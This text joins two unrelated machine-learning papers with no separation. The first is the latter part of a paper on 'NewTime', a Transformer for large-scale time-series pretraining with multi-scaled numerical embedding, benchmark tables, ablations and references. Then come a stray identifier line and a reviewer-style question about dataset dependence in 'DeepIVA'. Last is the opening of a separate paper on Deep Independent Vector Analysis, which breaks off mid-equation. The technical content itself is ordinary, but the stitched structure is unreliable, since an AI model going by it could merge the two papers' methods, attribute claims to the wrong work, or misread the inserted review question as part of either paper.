normalizing each sample by subtracting the mean and dividing by the std. However, it does not address the numerical challenge for the following reasons: - Z-score assumes a single domain scale of the dataset. Samples of this scale may be properly normalized, while samples out of the scale may be badly normalized. - During transfer learning, the target domain may not share the same statistics as those from the training dataset, thus inducing distribution shift problem Instance normalization operates by standardizing each sample using its respective per-sample mean and standard deviation. After processing, each sample is guaranteed to have zero mean and unit standard deviation. The caveats for this method include: - Essential information about the statistics of samples is removed, which could be detrimental to representation learning. - Instance normalization assumes a single scale of variation within a single sample. It will be ineffective if the sequence is long and contains multiple scales of variations. Based on these observations, we propose our approach for modeling large-scale time-series data. 3.2 Architecture Overview To build the pretraining model for time series analysis, we exploit the general-purpose Transformer (Vaswani et al., 2017), as it has been successfully adopted in natural language, speech and vision. The idea is to convert the input sequence into a set of tokens and then feed the tokens into the Transformer architecture. An extra \([\text{CLS}]\) token is inserted at position 0 in the input, and an MLP head is appended after the Transformer encoder for classification. In the following, we will assume the time series data to be univariate for simplicity. The extension to the multivariate case is explained in Section 3.4. The overall architecture for NewTime is depicted in Figure 2. We follow the tokenization process in the Vision Transformer (Dosovitskiy et al., 2020) by splitting the time series sequence into non-overlapping windows. Given the numerical challenges we described earlier, it is not feasible to embed each window using a simple linear layer. Instead, we may assume that data within each window has a single scale of variation given the window size is small. We normalize each window by its mean and std, then represent the window by three factors: the normalized shape, the mean scalar, and the std scalar. We concatenate the normalized shape embedding and the two scalar embeddings, and further project the concatenated one to the feature dimension of the Transformer. The resultant embedding is treated as an input token. After being added with a positional encoding, it is fed to the Transformer encoder. The normalized shape can be easily embedded with a linear layer and a layer normalization. However, embedding scalar values of unknown scales of variations is less obvious. 3.3 Numerically Multi-scaled Embedding A Case Study of Linear + LayerNorm for Encoding Scalars We begin the study by analyzing and understanding the encoding behavior of a simple linear layer followed by layer normalization (LayerNorm) (Ba et al., 2016), which is crucial as the linear layer maintains the magnitude of the input scalar, which would cause unstable optimization for neural network training. Denoting the input scalar as \(x\), we can express this simple encoding block as follows: \[ z = \text{FC}(x) = x \cdot w + k \cdot b \quad (k = 1 \text{ by default}), \] \[ y = \text{LN}(z) = \gamma \ast \frac{z - E[z]}{\sqrt{\text{Var}[z]}} + \beta = \gamma \ast \frac{x \cdot w + k \cdot b}{\sqrt{x^2 \sigma_w^2 + k^2 \sigma_b^2}} + \beta. \] where \(w\) and \(b\) are parameters of the linear layer, randomly initialized from the Gaussian distribution \(\mathcal{N}(0, \sigma_w^2)\) and \(\mathcal{N}(0, \sigma_b^2)\) respectively. \(\gamma\) and \(\beta\) are learnable affine parameters for the layer normalization and are assumed to be constant 1 and 0 here for simplicity. Note that we add a multiplier \(k\) to the bias parameter. This would help us understand the behavior of the embedding module. Figure 3: (a) **Output of a Basic Building Block**. The input and the output response for the basic building block of a linear layer and a LayerNorm with different multipliers $k$ set for the bias term. Only a single channel for the output is visualized. The function would saturate when the input is out of a scale related to $k$. (b) **Numerically Multi-scaled Embedding**. The numerically multi-scaled embedding module ensembles multiple basic building blocks with different multipliers $k$. The embedding is ensembled by a weighted average. We first notice that the output $y$ with respect to $x$ is no longer a linear function. In Figure 3(a), we plot one channel of the output $y$ as a function of $x$ for a number of $k$ values. The parameters of $w, b$ are randomly initialized. When $|x| \gg |k|$, $y$ will converge to constants $\pm w/\sigma_w$; and when $|x| \ll |k|$, $y$ will converge to constants $\pm b/\sigma_b$. This means that $y$ would fail to encode anything about $x$ when $x$ is significantly larger or smaller than a scale defined by $k$. **Ensembles of Numerically Multi-scaled Embeddings** Given the above analysis for the basic building block, we would need to set a proper $k$ at a scale similar to the input $x$. However, one cannot simply set $k = x$, because the overall function will cancel out $x$. We choose to enumerate all possible scales and ensemble the embeddings across scales. Let $y_i(x)$ denote the embedding of input scalar $x$ at scale $k_i$. The numerically multi-scaled embedding (NME) $e(x)$ is defined as: $$e(x) = \sum_i \alpha_i(x) \cdot y_i(x),$$ $$\alpha_i(x) = \frac{|\log^{-1}(|x|/k_i + \epsilon)|}{\sum_j |\log^{-1}(|x|/k_j + \epsilon)|}, \quad j = 1, 2, ..., n,$$ where $\alpha_i$ is a weighting term that is based on the proportion between $x$ and $k_i$, and $n$ is the number of ensembled embeddings. Ablation on the weighted average is presented in Appendix B. We densely set the value of $k_i$ as $10^{-4}, 10^{-3}, ..., 1, 10, ..., 10^3, 10^4$, so that it can cover almost all scales of variations in the pretraining dataset. With the proposed numerically multi-scaled embedding, we are able to represent arbitrary scalar values into a normalized vector space. The normalized vector space ensures that gradients for learning will flow smoothly. ### 3.4 Extension to Multivariate Data For multivariate time-series analysis, we encode each window independently for each time-series channel using the aforementioned method. The network parameters for encoding each window are shared across multivariate channels. Then, embeddings for each window are concatenated across channels and a linear layer follows to transform them to the Transformer feature size. The resultant embeddings are fed to the Transformer encoder. ## 4 Experiments ### 4.1 Experimental Settings **Pretraining Dataset** Existing datasets for time series analysis are relatively small individually. To address this limitation and facilitate large-scale representation learning, we propose to merge... several existing datasets into a unified dataset. We consider three main sources: (1) UCR time series archive (Dau et al., 2019), (2) UEA time series archive (Bagnall et al., 2018) and (3) eight additional datasets used in recent technical papers (Eldele et al., 2021b; Zhang et al., 2022; Dong et al., 2023). The original training and testing splits of these datasets are retained, and only the training portions are merged. The merged dataset consists of approximately 1.89 million univariate sequences for training. Details of the three data sources are provided below. (1) The UCR time series archive (Dau et al., 2019) contains 128 univariate time series datasets from various sources, including sensor, motion, trajectory, etc. In total, there are 60,555 in the training set of these 128 sub-datasets by their official split. (2) The UEA benchmark (Bagnall et al., 2018) contains 30 datasets with a wide range of cases, dimensions and series lengths for multivariate time series classification. For self-supervised pretraining, datasets containing excessively lengthy sequences are excluded, following which multivariate data is partitioned into univariate sequences. This finally leads to 1,386,874 sequences for training. (3) Other commonly used datasets in recent technical papers (Eldele et al., 2021b; Zhang et al., 2022; Dong et al., 2023) include: EPILEPSY (Andrzejak et al., 2001), SLEEP EEG (Kemp et al., 2000), HAR (Anguita et al., 2013), GESTURE (Liu et al., 2009), FD-A (Lessmeier et al., 2016), FD-B (Lessmeier et al., 2016), ECG (Clifford et al., 2017) and EMG (Goldberger et al., 2000). These datasets in total contain 441,757 training sequences. More information about these datasets is included in Appendix A. Pretraining Objective For self-supervised pretraining, we adopt the BYOL (Grill et al., 2020) objective for its simplicity and effectiveness. Two views of the input after data augmentation are fed to a Siamese network, where the base encoder is trained to predict the representation of the momentum encoder. We refer to the original paper for details. Implementation Details We adopt a 6-layer and 8-head standard Transformer encoder with fixed sinusoidal positional encoding (Vaswani et al., 2017) as the backbone for our experiments. It uses 128-dimensional latent vectors through all of its layers, with 512 dimensions for the MLP hidden layer size. The window size for input patches is 16. For the numerically multi-scaled embedding, we choose to use 9 scales, which range from $10^{-4}$ to $10^4$ by factors of 10. For pretraining, we simply choose the data augmentation of “random resized crop” for the BYOL objective. It randomly crops a sub-sequence from the original data between the range of 80% to 100%, and subsequently resizes the selected sub-sequence to a length of 512. The base learning rate is $2 \times 10^{-3}$ for the batch size 2048 following the linear scaling rule (Goyal et al., 2017). The model is trained for a total of 100 epochs with a linear learning rate warm-up in the first 10 epochs of training and a cosine learning rate decay scheduler (Loshchilov & Hutter, 2017) afterward. For optimization, we use AdamW (Loshchilov & Hutter, 2018) with $\beta_1 = 0.9$, $\beta_2 = 0.999$ and a weight decay of 0.05. The pretraining takes 6 hours on 4 V100 GPUs. We transfer the pretrained model to each downstream classification task by full finetuning. The finetuning takes 100 epochs with a learning rate of $2 \times 10^{-4}$ by default. Since the model is pretrained on univariate data, an additional linear layer is added in the data embedding module for the multivariate classification tasks. For all the experiments, we report the top-1 accuracy (%) “Acc.” for short) and macro F1 score (%) on the test set using the best model on the validation set. 4.2 Univariate Time Series Classification Compared with Supervised Baselines We first evaluate our model for univariate time series classification on 112 sub-datasets from the UCR archive. The 112 sub-datasets are chosen to exclude datasets containing series of unequal length or missing values following the practice of HIVE-COTE2.0 (HC2) (Middlehurst et al., 2021b). The state-of-the-art method HC2 is a heavily engineered system that ensembles a distinct set of classifiers: the shapelet-based classifiers (Bostrom & Bagnall, 2015), the ensemble of convolution-based classifiers (Dempster et al., 2020), the dictionary-based representation TDE (Middlehurst et al., 2021a) and the interval-based DrCIF (Middlehurst et al., 2020). Moreover, HC2 takes 1,500 epochs to train the learning-based part in its ensemble system. Due to great domain expertise being engineered into the state-of-the-art methods, only one deep learning method InceptionTime (Ismail Fawaz et al., 2020) is able to rank in the top 10 of the leaderboard. No prior self-supervised time series models perform close to HC2 and related methods. For fair comparisons, we ensemble 5 runs of results, each finetuned for 500 epochs with different random seeds using the same pretrained model. As shown in the critical difference diagram in Figure 4(a), the NewTime model achieves first place on this challenging benchmark. This is the first time that a pretrained model with a transfer learning pipeline outperforms domain-specific features and classifiers. Detailed comparisons with other methods are shown in Figure 5. Full results for these 112 datasets are in Appendix F.1. Compared with Self-supervised Baselines To compare with previous self-supervised representation learning methods, we consider the downstream classification tasks on 125 UCR datasets, Epilepsy, FD-B and EMG following Yue et al. (2022) and Zhang et al. (2022). The baseline methods conduct unsupervised learning on individual small datasets of thousands of sequences, and evaluate the learned representation on the testing set via finetuning or linear probing. Our approach is the first one which is able to pretrain models across datasets with high diversity. Our model is also the simplest one in terms of minimum data augmentations and a simple BYOL learning objective. The results are summarized in Table 1 and full results for the 125 UCR sub-datasets are in Appendix F.1. The reported performance for our model is the average performance of 5 independent runs. Our NewTime model outperforms the baselines on all the tested benchmarks. 4.3 Multivariate Time Series Classification Compared with Supervised Baselines We transfer the same pretrained model on univariate time-series data to multivariate classification benchmarks by an extension to the data embedding module described in Section 3.4. We first evaluate its performance on the UEA archive and compare it with state-of-the-art techniques, which are domain-specified supervised methods. The critical difference diagram and detailed comparisons to previous methods are shown in Figure 4(b) and Figure 6. Detailed results on the 26 datasets are in Appendix F.2. Our NewTime model achieves first place on this challenging benchmark against heavily engineered competitors. This demonstrates that the pretrained model successfully learns a transferable representation from single-dimensional data to multi-dimensional data. Table 1: Performance comparisons with self-supervised models for univariate time series classification. | | 125 UCR | Epilepsy | FD-B | EMG | |----------|---------|----------|------|-----| | | Avg. Acc.| Acc. | Macro-F1 | Acc. | Macro-F1 | | TNC | 74.31 | - | - | - | - | | T-Loss | 78.75 | - | - | - | - | | TS-TCC | 73.96 | 92.53±0.98 | 86.33±2.15 | 54.99±2.20 | 54.18±3.38 | | TS2Vec | 82.01 | 93.95±0.44 | 90.45±0.67 | 47.90±1.13 | 43.89±1.07 | | TF-C | - | 94.95±1.08 | 91.49±5.34 | 69.38±2.31 | 74.87±2.68 | | Ours | **86.91±0.10** | **95.73±0.10** | **93.11±0.16** | **92.86±2.04** | **93.64±1.99** | Table 2: Performance comparisons with self-supervised models for multivariate time series classification. | | 29 UEA Datasets | Gesture | |----------|-----------------|---------| | | Avg. Acc. | Avg. Rank | Acc. | Macro-F1 | | TNC | 67.7 | 4.8 | - | - | | T-Loss | 67.5 | 3.9 | - | - | | TS-TCC | 68.2 | 4.5 | 71.88±3.49 | 69.84±3.60 | | TS2Vec | 71.2 | 3.2 | 69.17±3.33 | 65.70±3.92 | | TF-C | - | - | 76.42±1.96 | 75.72±3.11 | | Ours | **77.8±0.43** | **1.5** | **80.00±1.36** | **78.97±0.90** | Table 3: Few-shot learning results (5 shots) on the UCR archive. | Method | Acc. | |------------|------| | 1NN | 56.6 | | DTW | 61.8 | | BOSS | 62.5 | | ResNet-Scratch | 62.7 | | FS-1 | 65.3 | | FS-2 | 66.3 | | Ours | **67.5** | Compared with Self-supervised Baselines We also compare the performance with strong self-supervised representation learning models. The results are summarized in Table 2, and full results are shown in Appendix F.2. Our model outperforms the baseline models by scaling the pretraining data effectively even with simple data augmentation and simple learning objectives. 4.4 Few-Shot Learning One critical capability for a large-scale representation learning model is the few-shot generalization. We follow a recent paper (Narwariya et al., 2020) for a few-shot time-series benchmark using 41 datasets from the UCR archive. We consider the 5-shot learning scenario and 100 episodes are drawn from each dataset. By finetuning the pretrained model with few-shot data, NewTime outperforms dedicated methods designed for few-shot adaption, such as meta-learning approaches. The results are summarized in Table 3 with details shown in Appendix E.3. 4.5 Ablation Study We conduct ablation studies on 128 UCR datasets. We report the average performance by either finetuning the model from the pretrained checkpoint or training the model from scratch. All results are the average of 5 runs. Data Normalization and Encoding We first study various ways to preprocess and normalize the data by keeping the overall Transformer backbone. We consider Z-score, instance normalization and no preprocessing (i.e., identity) at all for the input sequence. A linear layer and a LayerNorm are used to encode windows to tokens. We also consider alternative methods proposed in PLE (Gorishnyy et al., 2022) to encode the mean and the std scalars. In Table 4 our numerically multi-scaled embedding outperforms all the baselines. The PLE method relies on the quantiles of the training dataset and thus is difficult to scale properly when the data is complex and large. Number of Numerical Scales We vary the number of multipliers $k$ in our multi-scaled numerical data embedding module. In Table 5, the performance improves from a single scale to 9 scales for the Figure 6: Accuracy comparison of NewTime and (a) HIVE-COTE2.0 (Middlehurst et al., 2021b), (b) ROCKET (Dempster et al., 2020) and (c) HIVE-COTE1.0 (Lines et al., 2016) on 26 datasets from the UEA archive. Each subfigure’s title displays a win/tie/loss comparison between NewTime and other methods. The two dotted lines indicate the 5% interval. Table 4: Ablation study for various data encoding and normalization methods. | Encoding | Fine-tune | From Scratch | |----------|-----------|--------------| | | Acc. | Macro-F1 | Acc. | Macro-F1 | | Z-score | 80.88±0.13 | 76.75±0.46 | 76.59±0.35 | 71.26±0.92 | | IN | 79.97±0.54 | 75.47±0.84 | 75.38±0.60 | 69.73±0.98 | | Identity | 82.02±0.29 | 78.12±0.40 | 73.53±0.30 | 67.13±0.53 | | PLE-Q | 84.41±0.10 | 81.97±0.18 | 77.86±0.59 | 72.57±0.80 | | PLE-T | 83.59±0.14 | 80.97±0.19 | 73.25±0.69 | 66.84±1.05 | | PLE-P | 84.20±0.29 | 81.69±0.37 | 69.34±0.70 | 62.43±0.70 | | Ours | 86.87±0.11 | 84.74±0.182 | 79.30±0.84 | 74.09±1.48 | Table 5: Ablation study for varying the number of scales in the numerical embedding module. | Num. Scales | Fine-tuned | From Scratch | |-------------|------------|--------------| | | Acc. | Macro-F1 | Acc. | Macro-F1 | | 0 | 80.48±0.05 | 77.43±0.10 | 68.14±0.40 | 61.43±0.62 | | 1 | 86.45±0.20 | 84.01±0.36 | 74.19±0.54 | 67.64±1.23 | | 3 | 86.64±0.18 | 84.11±0.29 | 78.32±0.66 | 73.01±0.92 | | 5 | 86.74±0.13 | 84.35±0.33 | 79.30±0.84 | 74.09±1.48 | | 7 | 86.79±0.14 | 84.57±0.134 | 78.89±0.70 | 73.72±0.78 | | 9 | 86.87±0.11 | 84.74±0.18 | 78.58±0.45 | 73.13±0.95 | transfer setting. This shows that the capability to encode multi-scaled data is critical and our method provides an effective solution. Training from scratch attains its best results with 5 scales. Since the individual datasets are relatively small, this number of scales is sufficient in this case. Pretraining Data As many works study self-supervised transfer learning within the same domain (Eldele et al., 2021b; Yue et al., 2022; Zhang et al., 2022), we also pretrain our model on each individual dataset from the UCR archive and evaluate the performance on the same dataset. It achieves an accuracy of 79.7% and a Macro-F1 score of 74.8%, which is much lower than our large-scale pretraining results of 86.9% accuracy and 84.7% Macro-F1 score, which suggests that our model successfully learns a transferable representation from large-scale data. More ablation studies on window size and embedding dimension are provided in Appendix D. 5 CONCLUSION In this paper, we propose the NewTime model for large-scale time series pretraining. The model is based on the Transformer architecture, which takes input as a set of tokens from non-overlapping windows. Each window is represented by its normalized shape, the window mean and the window standard deviation. We further develop a multi-scaled numerical embedding method for representing the scalar values of mean and std. The model is able to take the raw value of time-series data as input without requiring any data normalization and transformation. To demonstrate that the proposed model can learn numerical structures with different scales of variations, we conduct the first large-scale pretraining on a dataset with great domain diversity. The pretrained model achieves state-of-the-art performance when transferred to downstream classification benchmarks. We hope that this work will pave the way to general-purpose foundation models for time-series analysis. Limitations The proposed method aims to effectively encode time-series data from diverse domains. It is not yet able to decode the representation to a numerical value at the original scale, and thus it is not suitable for forecasting problems. The learned representation of the model may be subjective to the biases and inequalities from the training data. The model might introduce unexpected behaviors on data it never sees during training. REFERENCES Ralph G Andrzejak, Klaus Lehnertz, Florian Mormann, Christoph Rieke, Peter David, and Christian E Elger. Indications of nonlinear deterministic and finite-dimensional structures in time series of brain electrical activity: Dependence on recording region and brain state. *Physical Review E*, 64(6):061907, 2001. Davide Anguita, Alessandro Ghio, Luca Oneto, Xavier Parra Perez, and Jorge Luis Reyes Ortiz. A public domain dataset for human activity recognition using smartphones. In *Proceedings of the 21th international European symposium on artificial neural networks, computational intelligence and machine learning*, pp. 437–442, 2013. Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hinton. Layer normalization. *arXiv preprint arXiv:1607.06450*, 2016. Anthony Bagnall, Hoang Anh Dau, Jason Lines, Michael Flynn, James Large, Aaron Bostrom, Paul Southam, and Eamonn Keogh. The uea multivariate time series classification archive, 2018. *arXiv preprint arXiv:1811.00075*, 2018. Aaron Bostrom and Anthony Bagnall. Binary shapelet transform for multiclass time series classification. In *Big Data Analytics and Knowledge Discovery: 17th International Conference, DaWaK 2015, Valencia, Spain, September 1-4, 2015, Proceedings* 17, pp. 257–269. Springer, 2015. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *Proceedings of the IEEE/CVF international conference on computer vision*, pp. 9650–9660, 2021. Gari D Clifford, Chengyu Liu, Benjamin Moody, H Lehman Li-wei, Ikaro Silva, Qiao Li, AE Johnson, and Roger G Mark. Af classification from a short single lead ecg recording: The physionet/computing in cardiology challenge 2017. In *2017 Computing in Cardiology (CinC)*, pp. 1–4. IEEE, 2017. Hoang Anh Dau, Anthony Bagnall, Kaveh Kamgar, Chin-Chia Michael Yeh, Yan Zhu, Shaghayegh Gharghabi, Chotirat Ann Ratanamahatana, and Eamonn Keogh. The ucr time series archive. *IEEE/CAA Journal of Automatica Sinica*, 6(6):1293–1305, 2019. Angus Dempster, François Petitjean, and Geoffrey I Webb. Rocket: exceptionally fast and accurate time series classification using random convolutional kernels. *Data Mining and Knowledge Discovery*, 34(5):1454–1495, 2020. Jiaxiang Dong, Haixu Wu, Haoran Zhang, Li Zhang, Jianmin Wang, and Mingsheng Long. Simmtm: A simple pre-training framework for masked time-series modeling. *arXiv preprint arXiv:2302.00861*, 2023. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations (ICLR)*, 2020. Emadeldeen Eldele, Mohamed Ragab, Zhenghua Chen, Min Wu, Chee Keong Kwoh, Xiaoli Li, and Cuntai Guan. Time-series representation learning via temporal and contextual contrasting. *arXiv preprint arXiv:2106.14112*, 2021a. Emadeldeen Eldele, Mohamed Ragab, Zhenghua Chen, Min Wu, Chee Keong Kwoh, Xiaoli Li, and Cuntai Guan. Time-series representation learning via temporal and contextual contrasting. In *Proceedings of the Thirtieth International Joint Conference on Artificial Intelligence, IJCAI-21*, pp. 2352–2359, 2021b.
77N93tc3o5
Could you please describe the dataset used in the experiments, and relate them to the DeepIVA model? What aspect of the neuroimaging data used in the experiments is supposed to be modelled with a statistical dependence across datasets/subjects (i.e., among components of $\mathbf{s}_i$)?
DEEP INDEPENDENT VECTOR ANALYSIS Anonymous authors Paper under double-blind review ABSTRACT We introduce a deep multivariate latent variable model, Deep Independent Vector Analysis (DeepIVA), for learning linked and identifiable latent sources across multiple data modalities by unifying multidataset independent subspace analysis (MISA) and identifiable variational autoencoders (iVAE). DeepIVA aims to learn hidden linkage information via the MISA loss to attain latent cross-modal alignment while leveraging the identifiability properties of the iVAE to ensure proper unimodal disentanglement. We propose a stricter set of performance measures, facilitating comprehensive evaluation. We demonstrate that DeepIVA can successfully recover nonlinearly mixed multimodal sources on multiple synthetic datasets compared with iVAE and MISA. We then apply DeepIVA on a large multimodal neuroimaging dataset, and show that DeepIVA can reveal linked imaging sources associated with phenotype measures. 1 INTRODUCTION One fundamental problem in representation learning is how to learn the latent variables used to generate the data. In blind source separation (BSS) (Silva et al., 2016), independent component analysis (ICA) (Comon, 1994) aims to recover latent sources that are statistically independent, but there is no guarantee of identifiability in general without additional assumptions. Notably, the solution of a linear ICA problem is identifiable only when at most one of latent sources is Gaussian (Comon, 1994). The solution of a nonlinear ICA problem, on the other hand, is highly non-unique without additional restrictions (Hyvärinen & Pajunen, 1999). If the learned sources are not identifiable, it is impossible to reveal the underlying structure of the data. Recent advancements in nonlinear ICA theory have proposed to recover identifiable latent sources mixed nonlinearly up to trivial indeterminacies by introducing auxiliary information (Hyvarinen & Morioka, 2016; Hyvarinen et al., 2019; Khemakhem et al., 2020). Specifically, an identifiable variational autoencoder (iVAE) (Khemakhem et al., 2020) has been proved to recover nonlinearly mixed sources up to permutations or sign flips by utilizing auxiliary variables such as time indices or class labels. It assumes that sources are conditionally independent given such auxiliary variables, in the form of an exponential family distribution. Apart from identifiability, we are often interested in learning linked representations from multiple data modalities, as each modality can only capture limited information of the data-generating system. For example, in the field of neuroimaging, structural magnetic resonance imaging (sMRI) can reveal static anatomical structure of the brain in high resolution, while functional magnetic resonance imaging (fMRI) can capture temporal dynamics at the cost of lower spatial resolution. Jointly analyzing two imaging modalities can uncover cross-modal relationships that cannot be detected by a single imaging modality, providing new insights into structural and functional interactions in the brain and its disorders (Calhoun & Sui, 2016). Recent studies on multi-view BSS assume that observations from different views originate from a shared source variable and distinct additive noise variables (Richard et al., 2020, 2021; Pandeva & Forr´e, 2023; Gresele et al., 2020). However, in the context of multimodal fusion, it is more reasonable to assume that each modality is generated by modality-specific latent variables which, in turn, are linked across modalities, rather than a shared set, especially for data modalities that are inherently heterogeneous. To identify linked sources from multiple datasets, a unified framework called multidataset independent subspace analysis (MISA) has been developed (Silva et al., 2020) encompassing multiple linear latent variable models, such as ICA (Comon, 1994), independent vector analysis (IVA) (Kim et al., 2006), and independent subspace analysis (ISA) (Cardoso, 1998). MISA can be applied to analyze... both multi-subject and multimodal neuroimaging data. Built upon MISA, multimodal IVA (MMIVA) (Silva et al., 2021) and multimodal subspace IVA (MSIVA) (Li et al., 2023a) have been recently developed to capture one-to-one and many-to-many latent multimodal associations, respectively. In both cases, the learned linked latents are found to be significantly associated with phenotype measures such as age, sex and psychosis from large-scale multimodal neuroimaging datasets including sMRI and fMRI. Although both MMIVA and MSIVA assume that sources undergo a linear mixing process, it is possible that the true mixing process in neuroimaging data is actually nonlinear, considering nonlinear transformations in modeling and preprocessing stages. For example, the hemodynamic response function that models the relationship between neural activities and fMRI signals is nonlinear; preprocessing steps such as coregistration include nonlinear transformations. Nonlinear methods such as deep neural networks (LeCun et al., 2015) have been increasingly applied for neuroimaging data analysis, showing the potential to learn robust brain-phenotype relationships (Abrol et al., 2021). Here, we ask the question: How can we learn linked and identifiable latent sources that are nonlinearly mixed across multiple data modalities? Built upon MISA and iVAE, we develop a deep multivariate latent variable model, Deep Independent Vector Analysis (DeepIVA), to learn linked and identifiable latent sources from multiple data modalities. In DeepIVA, we utilize the iVAE to identify sources from each modality, and the MISA loss function to align sources across all modalities. We demonstrate that DeepIVA can effectively recover sources compared to iVAE and MISA on multiple synthetic datasets and a large multimodal neuroimaging dataset. Our key contributions are as follows: • We propose a deep latent variable model, DeepIVA, to learn linked and identifiable representations from multimodal data by unifying MISA and iVAE; • We propose multiple evaluation metrics, including segment-specific minimum distance and trimmed mean correlation coefficient, to comprehensively characterize model performance; • We perform a systematic evaluation of model performance and demonstrate that DeepIVA can effectively learn linked and identifiable multimodal sources in multiple simulation configurations (different sources, segments, and observations per segment); • We apply DeepIVA on a large multimodal neuroimaging dataset to identify biologically meaningful sources associated with phenotype measures (age and sex). 2 METHODS 2.1 DEEP INDEPENDENT VECTOR ANALYSIS Independent Vector Analysis Independent vector analysis (IVA) (Kim et al., 2006) is a multivariate latent variable model which extends the ICA problem from a single dataset to multiple datasets and captures statistical dependence across datasets. IVA aims to identify linked vector sources across $M$ datasets or data modalities ($M > 1$) where each observation $x^m$ can be modeled as a linear mixture $A^m$ of statistically independent sources $s^m$: $$x^m = A^m s^m,$$ where $x^m \in \mathbb{R}^V$ is an observation in the $m$-th dataset or data modality $X^m \in \mathbb{R}^{N \times V}$, $s^m \in \mathbb{R}^C$ is the source corresponding to the observation $x^m$, $A^m \in \mathbb{R}^{V \times C}$ is the invertible linear mixing matrix, $m \in [1, M]$ indexes the dataset or data modality, $N$ is the number of observations, $V$ is the number of features, and $C$ is the number of sources ($C \leq V$). Particularly, in neuroimaging data, the observations are the subjects and the features are the volume pixel (voxel) intensities. The IVA algorithm seeks to identify the sources $\hat{s}^m$ by learning a demixing matrix $W^m$: $\hat{s}^m = W^m x^m$. The IVA problem can be solved by minimizing the following mutual information loss (Adali et al., 2014): $$L_{\text{IVA}} = \sum_{i=1}^{C} \left( \sum_{m=1}^{M} H(s^m_i) - I(s_i) \right) - \sum_{m=1}^{M} \log |\det W^m|,$$ where $H(\cdot)$ denotes the entropy, $I(\cdot)$ denotes the mutual information, $s_i$ is the $i$-th source component vector (SCV) which spans $M$ datasets, $s_i = [s^1_i, s^2_i, \ldots, s^m_i]^T$. The IVA objective aims to minimize the mutual information among SCVs while capturing multimodal dependence among sources within each SCV. Multidataset Independent Subspace Analysis (MISA) (Silva et al., 2020) is a unified framework encompassing multiple linear BSS models including ICA, IVA and ISA. MISA utilizes a multivariate Kotz distribution (Kotz, 1975) for SCV modeling: \[ p_{\psi}(s_i) = \frac{\beta^{\lambda} \Gamma\left(\frac{d_i}{2}\right)}{\pi^{d_i/2} (\det D_i)^{1/2} \Gamma(\nu)} e^{-\lambda(s_i^\top D_i^{-1}s_i)^{\beta}}, \] where \( \psi = [\beta, \lambda, \eta] \) is the set of Kotz hyperparameters, and \( d_i \) is the \( i \)-th SCV dimension, here \( d_i = M \). We define \( \nu = \frac{2\eta + d_i - 2}{2\beta} > 0 \) and \( \alpha = \frac{\Gamma(\nu + \beta^{-1})}{\lambda^{\beta-1} d_i \Gamma(\nu)} \) for brevity, where \( \Gamma(\cdot) \) denotes the gamma function. The positive definite dispersion matrix \( D_i \) is related to the SCV covariance matrix \( \Sigma_{s_i} \) as \( D_i = \alpha^{-1} \Sigma_{s_i} \). The Kotz distribution is highly flexible, as it encompasses the multivariate Gaussian distribution (\( \psi = [1, \frac{1}{2}, 1] \)) and the multivariate Laplace distribution (\( \psi = [\frac{1}{2}, 1, 1] \)). The MISA loss (Silva et al., 2020) is defined as the KL divergence between the joint distribution across all SCVs \( p_{\psi}(s) \) and the product of the Kotz distributions from each SCV \( p_{\psi}(s_i) \): \[ L_{\text{MISA}}(W) = D_{\text{KL}}(p_{\psi}(s) || \prod_{i=1}^{C} p_{\psi}(s_i)) \] \[ = - \sum_{m=1}^{M} J_{D_m} + \frac{1}{2} \sum_{i=1}^{C} J_{C_i} - f - \sum_{i=1}^{C} \frac{\mu - 1}{N} \sum_{n=1}^{N} J_{F_{in}} + \sum_{i=1}^{C} \frac{\lambda}{N} \sum_{n=1}^{N} J_{E_{in}}, \] where \( J_{D_m} = \sum_{i=1}^{C} \ln |\sigma_{m_i}| \) and \( \{\sigma_{m_i}\}_{i=1}^{C} \) is the set of non-zero singular values of the demixing matrix \( W_m \), \( J_{C_i} = \ln |\det D_i| \), \( J_{F_i} = \ln(s_i^\top D_i^{-1}s_i) \), \( J_{E_i} = \ln(s_i^\top D_i^{-1}s_i)^{\beta} \), \( f = \sum_{i=1}^{C} \left[ \ln \beta + \nu \ln \lambda + \ln \Gamma\left(\frac{d_i}{2}\right) - \frac{d_i}{2} \ln \pi - \ln \Gamma(\nu) \right] \). Identifiable Variational Autoencoder The original MISA framework only includes linear BSS methods. In practice, we are also often interested in learning nonlinear mixtures, especially for high-dimensional data such as neuroimaging. Recently, an identifiable variational autoencoder (iVAE) (Khemakhem et al., 2020) has been proposed to recover latent sources that are nonlinearly mixed by conditioning latents on auxiliary variables. It has also been proved that iVAE can recover independent conditional latent variables while maximizing the likelihood of generating the data, thus bridging the gap between iVAE and nonlinear ICA (see Appendix F in Khemakhem et al., 2020 for more details). Consider the following conditional unimodal generative model (Khemakhem et al., 2020): \[ x^m = f^m(s^m) + \epsilon^m, \quad m = 1, \ldots, M, \] \[ p_{\theta^m}(x^m, s^m | u) = p_{f^m}(x^m | s^m)p_{\rho^m,\lambda^m}(s^m | u), \] \[ p_{\epsilon^m}(x^m | s^m) = p_{\epsilon^m}(x^m - f^m(s^m)), \] \[ p_{T^m,\lambda^m}(s^m | u) = \prod_{i=1}^{C} \frac{Q_i^m(s^m)}{Z_i^m(u)} \exp \left[ \sum_{j=1}^{k} T_{i,j}^m(s^m)\lambda_{i,j}^m(u) \right], \] where \( x^m \in \mathbb{R}^V \) and \( u \in \mathbb{R}^S \) are observed random variables, \( s^m \in \mathbb{R}^C \) (\( C \leq V \)) is a latent variable, \( \epsilon^m \in \mathbb{R}^V \) is an independent modality-specific noise variable with probability density function \( p_{\epsilon^m}(\epsilon^m) \), \( \theta^m = (f^m, T^m, \lambda^m) \) is a set of parameters of the conditional generative model, and \( f^m : \mathbb{R}^C \to \mathbb{R}^V \) is a nonlinear mixing function. We assume that the prior on the latent variables \( p_{\rho^m}(s^m | u) \) is conditionally independent, and each unimodal source \( s^m \) follows a univariate exponential family distribution given the auxiliary variable \( u \), where \( Q_i^m \) is the 